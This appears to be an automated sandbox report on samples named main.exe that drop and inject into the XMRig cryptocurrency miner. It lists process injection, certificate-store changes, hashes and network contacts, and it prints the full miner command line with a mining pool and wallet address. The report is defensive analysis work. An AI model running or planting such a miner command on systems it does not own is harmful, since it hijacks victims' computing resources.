| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 548 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4840 wrote to memory of 548 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.90:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| NL | 52.111.243.30:443 | tcp | |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/548-14-0x0000024D76F40000-0x0000024D76F60000-memory.dmp
memory/548-15-0x0000024D76F80000-0x0000024D76FA0000-memory.dmp
memory/548-16-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-18-0x0000024D78870000-0x0000024D78890000-memory.dmp
memory/548-17-0x0000024D76FA0000-0x0000024D76FC0000-memory.dmp
memory/548-19-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-20-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-23-0x0000024D78870000-0x0000024D78890000-memory.dmp
memory/548-22-0x0000024D76FA0000-0x0000024D76FC0000-memory.dmp
memory/548-21-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-24-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-25-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-26-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-27-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-28-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-29-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-30-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-31-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-32-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-33-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-34-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-35-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-36-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-37-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-38-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-39-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-40-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-41-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-42-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-43-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-44-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-45-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-46-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-47-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-48-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-49-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-50-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-51-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-52-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-53-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-54-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-55-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-56-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-57-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-58-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-59-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-60-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-61-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-62-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-63-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-64-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-65-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-66-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-67-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-68-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-69-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-70-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-71-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-72-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-73-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-74-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-75-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-76-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-77-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-78-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-79-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-80-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-81-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
memory/548-82-0x00007FF65E130000-0x00007FF65EC33000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:37
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2876 wrote to memory of 2896 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2876 wrote to memory of 2896 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3044,i,12594301322143882025,16832588342008839449,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3764,i,12594301322143882025,16832588342008839449,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.43.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2896-14-0x000001B8DD500000-0x000001B8DD520000-memory.dmp
memory/2896-15-0x000001B8DD550000-0x000001B8DD570000-memory.dmp
memory/2896-16-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-18-0x000001B8DD590000-0x000001B8DD5B0000-memory.dmp
memory/2896-17-0x000001B8DD570000-0x000001B8DD590000-memory.dmp
memory/2896-19-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-20-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-23-0x000001B8DD590000-0x000001B8DD5B0000-memory.dmp
memory/2896-22-0x000001B8DD570000-0x000001B8DD590000-memory.dmp
memory/2896-21-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-24-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-25-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-26-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-27-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-28-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-29-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-30-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-31-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-32-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-33-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-34-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-35-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-36-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-37-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-38-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-39-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-40-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-41-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-42-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-43-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-44-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-45-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-46-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-47-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-48-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-49-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-50-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-51-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-52-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-53-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-54-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-55-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-56-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-57-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-58-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-59-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-60-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-61-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-62-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-63-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-64-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-65-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-66-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-67-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-68-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-69-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-70-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-71-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-72-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-73-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-74-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-75-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-76-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-77-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-78-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-79-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-80-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-81-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
memory/2896-82-0x00007FF7B4850000-0x00007FF7B5353000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
